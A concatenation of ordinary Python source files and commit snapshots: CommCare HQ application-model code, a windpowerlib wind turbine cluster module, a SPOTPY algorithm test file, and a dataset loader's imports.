'value': self.logo_refs[logo_name]['path'],
}
if with_media:
profile_url = self.media_profile_url if not is_odk else (self.odk_media_profile_url + '?latest=true')
else:
profile_url = self.profile_url if not is_odk else (self.odk_profile_url + '?latest=true')
if toggles.CUSTOM_PROPERTIES.enabled(self.domain) and "custom_properties" in self__profile:
app_profile['custom_properties'].update(self__profile['custom_properties'])
locale = self.get_build_langs(build_profile_id)[0]
return render_to_string(template, {
'is_odk': is_odk,
'app': self,
'profile_url': profile_url,
'app_profile': app_profile,
'cc_user_domain': cc_user_domain(self.domain),
'include_media_suite': with_media,
'uniqueid': self.copy_of or self.id,
'name': self.name,
'descriptor': u"Profile File",
'build_profile_id': build_profile_id,
'locale': locale
}).encode('utf-8')
@property
def custom_suite(self):
try:
return self.lazy_fetch_attachment('custom_suite.xml')
except ResourceNotFound:
return ""
def set_custom_suite(self, value):
self.put_attachment(value, 'custom_suite.xml')
def create_suite(self, build_profile_id=None):
if self.application_version == APP_V1:
template='app_manager/suite-%s.xml' % self.application_version
langs = self.get_build_langs(build_profile_id)
return render_to_string(template, {
'app': self,
'langs': ["default"] + langs
})
else:
return SuiteGenerator(self, build_profile_id).generate_suite()
def create_media_suite(self, build_profile_id=None):
return MediaSuiteGenerator(self, build_profile_id).generate_suite()
@classmethod
def get_form_filename(cls, type=None, form=None, module=None):
return 'modules-%s/forms-%s.xml' % (module.id, form.id)
def create_all_files(self, build_profile_id=None):
prefix = '' if not build_profile_id else build_profile_id + '/'
files = {
'{}profile.xml'.format(prefix): self.create_profile(is_odk=False, build_profile_id=build_profile_id),
'{}profile.ccpr'.format(prefix): self.create_profile(is_odk=True, build_profile_id=build_profile_id),
'{}media_profile.xml'.format(prefix):
self.create_profile(is_odk=False, with_media=True, build_profile_id=build_profile_id),
'{}media_profile.ccpr'.format(prefix):
self.create_profile(is_odk=True, with_media=True, build_profile_id=build_profile_id),
'{}suite.xml'.format(prefix): self.create_suite(build_profile_id),
'{}media_suite.xml'.format(prefix): self.create_media_suite(build_profile_id),
}
langs_for_build = self.get_build_langs(build_profile_id)
for lang in ['default'] + langs_for_build:
files["{prefix}{lang}/app_strings.txt".format(
prefix=prefix, lang=lang)] = self.create_app_strings(lang, build_profile_id)
for form_stuff in self.get_forms(bare=False):
filename = prefix + self.get_form_filename(**form_stuff)
form = form_stuff['form']
try:
files[filename] = self.fetch_xform(form=form, build_profile_id=build_profile_id)
except XFormException as e:
raise XFormException(_('Error in form "{}": {}').format(trans(form.name), unicode(e)))
return files
get_modules = IndexedSchema.Getter('modules')
@parse_int([1])
def get_module(self, i):
try:
return self.modules[i].with_id(i % len(self.modules), self)
except IndexError:
raise ModuleNotFoundException()
def get_module_by_unique_id(self, unique_id):
def matches(module):
return module.get_or_create_unique_id() == unique_id
for obj in self.get_modules():
if matches(obj):
return obj
raise ModuleNotFoundException(
("Module in app '%s' with unique id '%s' not found"
% (self.id, unique_id)))
def get_forms(self, bare=True):
for module in self.get_modules():
for form in module.get_forms():
yield form if bare else {
'type': 'module_form',
'module': module,
'form': form
}
def get_form(self, unique_form_id, bare=True):
def matches(form):
return form.get_unique_id() == unique_form_id
for obj in self.get_forms(bare):
if matches(obj if bare else obj['form']):
return obj
raise FormNotFoundException(
("Form in app '%s' with unique id '%s' not found"
% (self.id, unique_form_id)))
def get_form_location(self, unique_form_id):
for m_index, module in enumerate(self.get_modules()):
for f_index, form in enumerate(module.get_forms()):
if unique_form_id == form.unique_id:
return m_index, f_index
raise KeyError("Form in app '%s' with unique id '%s' not found" % (self.id, unique_form_id))
@classmethod
def new_app(cls, domain, name, application_version, lang="en"):
app = cls(domain=domain, modules=[], name=name, langs=[lang], application_version=application_version)
return app
def add_module(self, module):
self.modules.append(module)
return self.get_module(-1)
def delete_module(self, module_unique_id):
try:
module = self.get_module_by_unique_id(module_unique_id)
except ModuleNotFoundException:
return None
record = DeleteModuleRecord(
domain=self.domain,
app_id=self.id,
module_id=module.id,
module=module,
datetime=datetime.datetime.utcnow()
)
del self.modules[module.id]
record.save()
return record
def new_form(self, module_id, name, lang, attachment=""):
module = self.get_module(module_id)
return module.new_form(name, lang, attachment)
def delete_form(self, module_unique_id, form_unique_id):
try:
module = self.get_module_by_unique_id(module_unique_id)
form = self.get_form(form_unique_id)
except (ModuleNotFoundException, FormNotFoundException):
return None
record = DeleteFormRecord(
domain=self.domain,
app_id=self.id,
module_unique_id=module_unique_id,
form_id=form.id,
form=form,
datetime=datetime.datetime.utcnow(),
)
record.save()
try:
form.pre_delete_hook()
except NotImplementedError:
pass
del module['forms'][form.id]
return record
def rename_lang(self, old_lang, new_lang):
validate_lang(new_lang)
if old_lang == new_lang:
return
if new_lang in self.langs:
raise AppEditingError("Language %s already exists!" % new_lang)
for i,lang in enumerate(self.langs):
if lang == old_lang:
self.langs[i] = new_lang
for profile in self.build_profiles:
for i, lang in enumerate(profile.langs):
if lang == old_lang:
profile.langs[i] = new_lang
for module in self.get_modules():
module.rename_lang(old_lang, new_lang)
_rename_key(self.translations, old_lang, new_lang)
def rearrange_modules(self, i, j):
modules = self.modules
try:
modules.insert(i, modules.pop(j))
except IndexError:
raise RearrangeError()
self.modules = modules
def rearrange_forms(self, to_module_id, from_module_id, i, j):
"""
The case type of the two modules conflict,
ConflictingCaseTypeError is raised,
but the rearrangement (confusingly) goes through anyway.
This is intentional.
"""
to_module = self.get_module(to_module_id)
from_module = self.get_module(from_module_id)
try:
from_module.forms[j].pre_move_hook(from_module, to_module)
except NotImplementedError:
pass
try:
form = from_module.forms.pop(j)
to_module.add_insert_form(from_module, form, index=i, with_source=True)
except IndexError:
raise RearrangeError()
if to_module.case_type != from_module.case_type:
raise ConflictingCaseTypeError()
def scrub_source(self, source):
return update_unique_ids(source)
def copy_form(self, module_id, form_id, to_module_id):
"""
The case type of the two modules conflict,
ConflictingCaseTypeError is raised,
but the copying (confusingly) goes through anyway.
This is intentional.
"""
from_module = self.get_module(module_id)
form = from_module.get_form(form_id)
to_module = self.get_module(to_module_id)
self._copy_form(from_module, form, to_module, rename=True)
def _copy_form(self, from_module, form, to_module, *args, **kwargs):
if not form.source:
raise BlankXFormError()
copy_source = deepcopy(form.to_json())
if 'unique_id' in copy_source:
del copy_source['unique_id']
if 'rename' in kwargs and kwargs['rename']:
for lang, name in copy_source['name'].iteritems():
with override(lang):
copy_source['name'][lang] = _('Copy of {name}').format(name=name)
copy_form = to_module.add_insert_form(from_module, FormBase.wrap(copy_source))
save_xform(self, copy_form, form.source)
if from_module['case_type'] != to_module['case_type']:
raise ConflictingCaseTypeError()
@cached_property
def has_case_management(self):
for module in self.get_modules():
for form in module.get_forms():
if len(form.active_actions()) > 0:
return True
return False
@memoized
def case_type_exists(self, case_type):
return case_type in self.get_case_types()
@memoized
def get_case_types(self):
extra_types = set()
if is_usercase_in_use(self.domain):
extra_types.add(USERCASE_TYPE)
return set(chain(*[m.get_case_types() for m in self.get_modules()])) | extra_types
def has_media(self):
return len(self.multimedia_map) > 0
@memoized
def get_xmlns_map(self):
xmlns_map = defaultdict(list)
for form in self.get_forms():
xmlns_map[form.xmlns].append(form)
return xmlns_map
def get_form_by_xmlns(self, xmlns, log_missing=True):
if xmlns == "http://code.javarosa.org/devicereport":
return None
forms = self.get_xmlns_map()[xmlns]
if len(forms) != 1:
if log_missing or len(forms) > 1:
logging.error('App %s in domain %s has %s forms with xmlns %s' % (
self.get_id,
self.domain,
len(forms),
xmlns,
))
return None
else:
form, = forms
return form
def get_questions(self, xmlns):
form = self.get_form_by_xmlns(xmlns)
if not form:
return []
return form.get_questions(self.langs)
def check_subscription(self):
def app_uses_usercase(app):
return any(m.uses_usercase() for m in app.get_modules())
errors = []
if app_uses_usercase(self) and not domain_has_privilege(self.domain, privileges.USER_CASE):
errors.append({
'type': 'subscription',
'message': _('Your application is using User Case functionality. You can remove User Case '
'functionality by opening the User Case Management tab in a form that uses it, and '
'clicking "Remove User Case Properties".')
})
return errors
def validate_app(self):
xmlns_count = defaultdict(int)
errors = []
for lang in self.langs:
if not lang:
errors.append({'type': 'empty lang'})
if not self.modules:
errors.append({'type': "no modules"})
for module in self.get_modules():
errors.extend(module.validate_for_build())
for form in self.get_forms():
errors.extend(form.validate_for_build(validate_module=False))
# make sure that there aren't duplicate xmlns's
xmlns_count[form.xmlns] += 1
for xmlns in xmlns_count:
if xmlns_count[xmlns] > 1:
errors.append({'type': "duplicate xmlns", "xmlns": xmlns})
if any(not module.unique_id for module in self.get_modules()):
raise ModuleIdMissingException
modules_dict = {m.unique_id: m for m in self.get_modules()}
def _parent_select_fn(module):
if hasattr(module, 'parent_select') and module.parent_select.active:
return module.parent_select.module_id
if self._has_dependency_cycle(modules_dict, _parent_select_fn):
errors.append({'type': 'parent cycle'})
errors.extend(self._child_module_errors(modules_dict))
errors.extend(self.check_subscription())
if not errors:
errors = super(Application, self).validate_app()
return errors
def _has_dependency_cycle(self, modules, neighbour_id_fn):
"""
Detect dependency cycles given modules and the neighbour_id_fn
:param modules: A mapping of module unique_ids to Module objects
:neighbour_id_fn: function to get the neibour module unique_id
:return: True if there is a cycle in the module relationship graph
"""
visited = set()
completed = set()
def cycle_helper(m):
if m.id in visited:
if m.id in completed:
return False
return True
visited.add(m.id)
parent = modules.get(neighbour_id_fn(m), None)
if parent is not None and cycle_helper(parent):
return True
completed.add(m.id)
return False
for module in modules.values():
if cycle_helper(module):
return True
return False
def _child_module_errors(self, modules_dict):
module_errors = []
def _root_module_fn(module):
if hasattr(module, 'root_module_id'):
return module.root_module_id
if self._has_dependency_cycle(modules_dict, _root_module_fn):
module_errors.append({'type': 'root cycle'})
module_ids = set([m.unique_id for m in self.get_modules()])
root_ids = set([_root_module_fn(m) for m in self.get_modules() if _root_module_fn(m) is not None])
if not root_ids.issubset(module_ids):
module_errors.append({'type': 'unknown root'})
return module_errors
def get_profile_setting(self, s_type, s_id):
setting = self.profile.get(s_type, {}).get(s_id)
if setting is not None:
return setting
yaml_setting = commcare_settings.get_commcare_settings_lookup()[s_type][s_id]
for contingent in yaml_setting.get("contingent_default", []):
if check_condition(self, contingent["condition"]):
setting = contingent["value"]
if setting is not None:
return setting
if self.build_version < yaml_setting.get("since", "0"):
setting = yaml_setting.get("disabled_default", None)
if setting is not None:
return setting
return yaml_setting.get("default")
@property
def has_careplan_module(self):
return any((module for module in self.modules if isinstance(module, CareplanModule)))
@quickcache(['self.version'])
def get_case_metadata(self):
from corehq.apps.reports.formdetails.readable import AppCaseMetadata
builder = ParentCasePropertyBuilder(self)
case_relationships = builder.get_parent_type_map(self.get_case_types())
meta = AppCaseMetadata()
for case_type, relationships in case_relationships.items():
type_meta = meta.get_type(case_type)
type_meta.relationships = relationships
for module in self.get_modules():
for form in module.get_forms():
form.update_app_case_meta(meta)
seen_types = []
def get_children(case_type):
seen_types.append(case_type)
return [type_.name for type_ in meta.case_types if type_.relationships.get('parent') == case_type]
def get_hierarchy(case_type):
return {child: get_hierarchy(child) for child in get_children(case_type)}
roots = [type_ for type_ in meta.case_types if not type_.relationships]
for type_ in roots:
meta.type_hierarchy[type_.name] = get_hierarchy(type_.name)
for type_ in meta.case_types:
if type_.name not in seen_types:
meta.type_hierarchy[type_.name] = {}
type_.error = _("Error in case type hierarchy")
return meta
def get_subcase_types(self, case_type):
"""
Return the subcase types defined across an app for the given case type
"""
return {t for m in self.get_modules()
if m.case_type == case_type
for t in m.get_subcase_types()}
class RemoteApp(ApplicationBase):
"""
A wrapper for a url pointing to a suite or profile file. This allows you to
write all the files for an app by hand, and then give the url to app_manager
and let it package everything together for you.
"""
profile_url = StringProperty(default="http://")
name = StringProperty()
manage_urls = BooleanProperty(default=False)
questions_map = DictProperty(required=False)
def is_remote_app(self):
return True
@classmethod
def new_app(cls, domain, name, lang='en'):
app = cls(domain=domain, name=name, langs=[lang])
return app
def create_profile(self, is_odk=False, langs=None):
# we don't do odk for now anyway
return remote_app.make_remote_profile(self, langs)
def strip_location(self, location):
return remote_app.strip_location(self.profile_url, location)
def fetch_file(self, location):
location = self.strip_location(location)
url = urljoin(self.profile_url, location)
try:
content = urlopen(url).read()
except Exception:
raise AppEditingError('Unable to access resource url: "%s"' % url)
return location, content
def get_build_langs(self):
if self.build_profiles:
if len(self.build_profiles.keys()) > 1:
raise AppEditingError('More than one app profile for a remote app')
else:
# return first profile, generated as part of lazy migration
return self.build_profiles[self.build_profiles.keys()[0]].langs
else:
return self.langs
@classmethod
def get_locations(cls, suite):
for resource in suite.findall('*/resource'):
try:
loc = resource.findtext('location[@authority="local"]')
except Exception:
loc = resource.findtext('location[@authority="remote"]')
yield resource.getparent().tag, loc
@property
def SUITE_XPATH(self):
return 'suite/resource/location[@authority="local"]'
def create_all_files(self, build_profile_id=None):
langs_for_build = self.get_build_langs()
files = {
'profile.xml': self.create_profile(langs=langs_for_build),
}
tree = _parse_xml(files['profile.xml'])
def add_file_from_path(path, strict=False, transform=None):
added_files = []
# must find at least one
try:
tree.find(path).text
except (TypeError, AttributeError):
if strict:
raise AppEditingError("problem with file path reference!")
else:
return
for loc_node in tree.findall(path):
loc, file = self.fetch_file(loc_node.text)
if transform:
file = transform(file)
files[loc] = file
added_files.append(file)
return added_files
add_file_from_path('features/users/logo')
try:
suites = add_file_from_path(
self.SUITE_XPATH,
strict=True,
transform=(lambda suite:
remote_app.make_remote_suite(self, suite))
)
except AppEditingError:
raise AppEditingError(ugettext('Problem loading suite file from profile file. Is your profile file correct?'))
for suite in suites:
suite_xml = _parse_xml(suite)
for tag, location in self.get_locations(suite_xml):
location, data = self.fetch_file(location)
if tag == 'xform' and langs_for_build:
try:
xform = XForm(data)
except XFormException as e:
raise XFormException('In file %s: %s' % (location, e))
xform.exclude_languages(whitelist=langs_for_build)
data = xform.render()
files.update({location: data})
return files
def make_questions_map(self):
langs_for_build = self.get_build_langs()
if self.copy_of:
xmlns_map = {}
def fetch(location):
filepath = self.strip_location(location)
return self.fetch_attachment('files/%s' % filepath)
profile_xml = _parse_xml(fetch('profile.xml'))
suite_location = profile_xml.find(self.SUITE_XPATH).text
suite_xml = _parse_xml(fetch(suite_location))
for tag, location in self.get_locations(suite_xml):
if tag == 'xform':
xform = XForm(fetch(location))
xmlns = xform.data_node.tag_xmlns
questions = xform.get_questions(langs_for_build)
xmlns_map[xmlns] = questions
return xmlns_map
else:
return None
def get_questions(self, xmlns):
if not self.questions_map:
self.questions_map = self.make_questions_map()
if not self.questions_map:
return []
self.save()
questions = self.questions_map.get(xmlns, [])
return questions
str_to_cls = {
"Application": Application,
"Application-Deleted": Application,
"RemoteApp": RemoteApp,
"RemoteApp-Deleted": RemoteApp,
}
def import_app(app_id_or_source, domain, source_properties=None, validate_source_domain=None):
if isinstance(app_id_or_source, basestring):
app_id = app_id_or_source
source = get_app(None, app_id)
src_dom = source['domain']
if validate_source_domain:
validate_source_domain(src_dom)
source = source.export_json()
source = json.loads(source)
else:
cls = str_to_cls[app_id_or_source['doc_type']]
# Don't modify original app source
app = cls.wrap(deepcopy(app_id_or_source))
source = app.export_json(dump_json=False)
try:
attachments = source['_attachments']
except KeyError:
attachments = {}
finally:
source['_attachments'] = {}
if source_properties is not None:
for key, value in source_properties.iteritems():
source[key] = value
cls = str_to_cls[source['doc_type']]
# Allow the wrapper to update to the current default build_spec
if 'build_spec' in source:
del source['build_spec']
app = cls.from_source(source, domain)
app.cloudcare_enabled = domain_has_privilege(domain, privileges.CLOUDCARE)
with app.atomic_blobs():
for name, attachment in attachments.items():
if re.match(ATTACHMENT_REGEX, name):
app.put_attachment(attachment, name)
if not app.is_remote_app():
for _, m in app.get_media_objects():
if domain not in m.valid_domains:
m.valid_domains.append(domain)
m.save()
if not app.is_remote_app() and any(module.uses_usercase() for module in app.get_modules()):
from corehq.apps.app_manager.util import enable_usercase
enable_usercase(domain)
return app
class DeleteApplicationRecord(DeleteRecord):
app_id = StringProperty()
def undo(self):
app = ApplicationBase.get(self.app_id)
app.doc_type = app.get_doc_type()
app.save(increment_version=False)
class DeleteModuleRecord(DeleteRecord):
app_id = StringProperty()
module_id = IntegerProperty()
module = SchemaProperty(ModuleBase)
def undo(self):
app = Application.get(self.app_id)
modules = app.modules
modules.insert(self.module_id, self.module)
app.modules = modules
app.save()
class DeleteFormRecord(DeleteRecord):
app_id = StringProperty()
module_id = IntegerProperty()
module_unique_id = StringProperty()
form_id = IntegerProperty()
form = SchemaProperty(FormBase)
def undo(self):
app = Application.get(self.app_id)
if self.module_unique_id is not None:
module = app.get_module_by_unique_id(self.module_unique_id)
else:
module = app.modules[self.module_id]
forms = module.forms
forms.insert(self.form_id, self.form)
module.forms = forms
app.save()
class CareplanAppProperties(DocumentSchema):
name = StringProperty()
latest_release = StringProperty()
case_type = StringProperty()
goal_conf = DictProperty()
task_conf = DictProperty()
class CareplanConfig(Document):
domain = StringProperty()
app_configs = SchemaDictProperty(CareplanAppProperties)
@classmethod
def for_domain(cls, domain):
res = cache_core.cached_view(
cls.get_db(),
"by_domain_doc_type_date/view",
key=[domain, 'CareplanConfig', None],
reduce=False,
include_docs=True,
wrapper=cls.wrap)
if len(res) > 0:
result = res[0]
else:
result = None
return result
# backwards compatibility with suite-1.0.xml
FormBase.get_command_id = lambda self: id_strings.form_command(self)
FormBase.get_locale_id = lambda self: id_strings.form_locale(self)
ModuleBase.get_locale_id = lambda self: id_strings.module_locale(self)
ModuleBase.get_case_list_command_id = lambda self: id_strings.case_list_command(self)
ModuleBase.get_case_list_locale_id = lambda self: id_strings.case_list_locale(self)
Module.get_referral_list_command_id = lambda self: id_strings.referral_list_command(self)
Module.get_referral_list_locale_id = lambda self: id_strings.referral_list_locale(self)
|
"""
The ``wind_turbine_cluster`` module is under development and is not working yet.
"""
# TODO: desciption
__copyright__ = "Copyright oemof developer group"
__license__ = "GPLv3"
import numpy as np
#from windpowerlib import wind_turbine
class WindTurbineCluster(object):
r"""
Parameters
----------
object_name : string
Name of the wind turbine cluster.
wind_farms : list
...
coordinates : list or None
List of coordinates [lat, lon] of location for loading data.
Default: None.
Attributes
----------
object_name : string
Name of the wind turbine cluster.
wind_farms : list
...
coordinates : list or None
List of coordinates [lat, lon] of location for loading data.
Default: None.
hub_height : float
The calculated average hub height of the wind turbine cluster.
installed_power : float
The calculated installed power of the wind turbine cluster.
power_curve : pandas.DataFrame or None
The calculated power curve of the wind turbine cluster.
power_output : pandas.Series
The calculated power output of the wind turbine cluster.
"""
def __init__(self, object_name, wind_farms, coordinates=None):
self.object_name = object_name
self.wind_farms = wind_farms
self.coordinates = coordinates
self.hub_height = None
self.installed_power = None
self.power_curve = None
self.power_output = None
def mean_hub_height(self):
r"""
Calculates the mean power weighted hub height of the turbine cluster.
Assigns the hub height to the wind turbine cluster object.
Returns
-------
self
Notes
-----
The following equation is used [1]_:
.. math:: h_{WF} = e^{\sum\limits_{k}{ln(h_{WT,k})}
\frac{P_{N,k}}{\sum\limits_{k}{P_{N,k}}}}
with:
:math:`h_{WF}`: mean hub height of wind farm,
:math:`h_{WT,k}`: hub height of the k-th wind turbine of a wind
farm, :math:`P_{N,k}`: nominal power of the k-th wind turbine,
References
----------
.. [1] Knorr, K.: "Modellierung von raum-zeitlichen Eigenschaften der
Windenergieeinspeisung für wetterdatenbasierte
Windleistungssimulationen". Universität Kassel, Diss., 2016,
p. 35
"""
self.hub_height = np.exp(
sum(np.log(wind_farm.hub_height) * wind_farm.installed_power for
wind_farm in self.wind_farms) / self.get_installed_power())
return self
Add function for installed power of turbine cluster
"""
The ``wind_turbine_cluster`` module is under development and is not working yet.
"""
# TODO: desciption
__copyright__ = "Copyright oemof developer group"
__license__ = "GPLv3"
import numpy as np
#from windpowerlib import wind_turbine
class WindTurbineCluster(object):
r"""
Parameters
----------
object_name : string
Name of the wind turbine cluster.
wind_farms : list
...
coordinates : list or None
List of coordinates [lat, lon] of location for loading data.
Default: None.
Attributes
----------
object_name : string
Name of the wind turbine cluster.
wind_farms : list
...
coordinates : list or None
List of coordinates [lat, lon] of location for loading data.
Default: None.
hub_height : float
The calculated average hub height of the wind turbine cluster.
installed_power : float
The calculated installed power of the wind turbine cluster.
power_curve : pandas.DataFrame or None
The calculated power curve of the wind turbine cluster.
power_output : pandas.Series
The calculated power output of the wind turbine cluster.
"""
def __init__(self, object_name, wind_farms, coordinates=None):
self.object_name = object_name
self.wind_farms = wind_farms
self.coordinates = coordinates
self.hub_height = None
self.installed_power = None
self.power_curve = None
self.power_output = None
def mean_hub_height(self):
r"""
Calculates the mean power weighted hub height of the turbine cluster.
Assigns the hub height to the wind turbine cluster object.
Returns
-------
self
Notes
-----
The following equation is used [1]_:
.. math:: h_{WF} = e^{\sum\limits_{k}{ln(h_{WT,k})}
\frac{P_{N,k}}{\sum\limits_{k}{P_{N,k}}}}
with:
:math:`h_{WF}`: mean hub height of wind farm,
:math:`h_{WT,k}`: hub height of the k-th wind turbine of a wind
farm, :math:`P_{N,k}`: nominal power of the k-th wind turbine,
References
----------
.. [1] Knorr, K.: "Modellierung von raum-zeitlichen Eigenschaften der
Windenergieeinspeisung für wetterdatenbasierte
Windleistungssimulationen". Universität Kassel, Diss., 2016,
p. 35
"""
self.hub_height = np.exp(
sum(np.log(wind_farm.hub_height) * wind_farm.installed_power for
wind_farm in self.wind_farms) / self.get_installed_power())
return self
def get_installed_power(self):
r"""
Calculates the installed power of a wind turbine cluster.
Returns
-------
float
Installed power of the wind turbine cluster.
"""
return sum(wind_farm.installed_power for wind_farm in self.wind_farms)
|
# -*- coding: utf-8 -*-
'''
Copyright (c) 2018 by Tobias Houska
This file is part of Statistical Parameter Optimization Tool for Python(SPOTPY).
:author: Tobias Houska
This file holds the example code from the Rosenbrock tutorial web-documention.
'''
import unittest
try:
import spotpy
except ImportError:
import sys
sys.path.append(".")
import spotpy
import numpy as np
from spotpy.examples.spot_setup_rosenbrock import spot_setup
from spotpy.describe import describe
#https://docs.python.org/3/library/unittest.html
class TestAlgorithms(unittest.TestCase):
# How many digits to match in case of floating point answers
self.tolerance = 7
#Create samplers for every algorithm:
self.spot_setup=spot_setup()
self.rep=1000
self.timeout=10 #Given in Seconds
self.parallel = "seq"
self.dbformat = "csv"
def test_mc(self):
sampler=spotpy.algorithms.mc(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_lhs(self):
sampler=spotpy.algorithms.lhs(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_mle(self):
sampler=spotpy.algorithms.mle(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_mcmc(self):
sampler=spotpy.algorithms.mcmc(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_demcz(self):
sampler=spotpy.algorithms.demcz(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_dream(self):
sampler=spotpy.algorithms.dream(spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_sceua(self):
sampler=spotpy.algorithms.sceua(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_abc(self):
sampler=spotpy.algorithms.abc(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_fscabc(self):
sampler=spotpy.algorithms.fscabc(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_rope(self):
sampler=spotpy.algorithms.rope(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_sa(self):
sampler=spotpy.algorithms.sa(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_list(self):
sampler=spotpy.algorithms.list(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_fast(self):
sampler=spotpy.algorithms.fast(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), 2, self.tolerance) #Si values should be returned
@classmethod
def tearDownClass(cls):
try:
os.remove("Rosen.csv")
except FileNotFoundError:
pass
if __name__ == '__main__':
unittest.main(exit=False)
Implement use of __init__ in test class
# -*- coding: utf-8 -*-
'''
Copyright (c) 2018 by Tobias Houska
This file is part of Statistical Parameter Optimization Tool for Python(SPOTPY).
:author: Tobias Houska
This file holds the example code from the Rosenbrock tutorial web-documention.
'''
import unittest
try:
import spotpy
except ImportError:
import sys
sys.path.append(".")
import spotpy
import numpy as np
from spotpy.examples.spot_setup_rosenbrock import spot_setup
from spotpy.describe import describe
#https://docs.python.org/3/library/unittest.html
class TestAlgorithms(unittest.TestCase):
def __init__(self):
# How many digits to match in case of floating point answers
self.tolerance = 7
#Create samplers for every algorithm:
self.spot_setup = spot_setup()
self.rep = 1000
self.timeout = 10 #Given in Seconds
self.parallel = "seq"
self.dbformat = "csv"
def test_mc(self):
sampler=spotpy.algorithms.mc(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_lhs(self):
sampler=spotpy.algorithms.lhs(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_mle(self):
sampler=spotpy.algorithms.mle(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_mcmc(self):
sampler=spotpy.algorithms.mcmc(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_demcz(self):
sampler=spotpy.algorithms.demcz(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_dream(self):
sampler=spotpy.algorithms.dream(spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_sceua(self):
sampler=spotpy.algorithms.sceua(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_abc(self):
sampler=spotpy.algorithms.abc(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_fscabc(self):
sampler=spotpy.algorithms.fscabc(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_rope(self):
sampler=spotpy.algorithms.rope(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_sa(self):
sampler=spotpy.algorithms.sa(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_list(self):
sampler=spotpy.algorithms.list(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), self.rep, self.tolerance)
def test_fast(self):
sampler=spotpy.algorithms.fast(self.spot_setup,parallel=self.parallel, dbname='Rosen', dbformat=self.dbformat, sim_timeout=self.timeout)
results = sampler.sample(self.rep)
self.assertAlmostEqual(len(results), 2, self.tolerance) #Si values should be returned
@classmethod
def tearDownClass(cls):
try:
os.remove("Rosen.csv")
except FileNotFoundError:
pass
if __name__ == '__main__':
unittest.main(exit=False)
|
from __future__ import division
from __future__ import print_function
import os
from xml.dom.minidom import parse
import numpy as np
from skimage.io import imread
from skimage.transform import resize
from .dataset import Datasets
from .download import maybe_download_and_extract
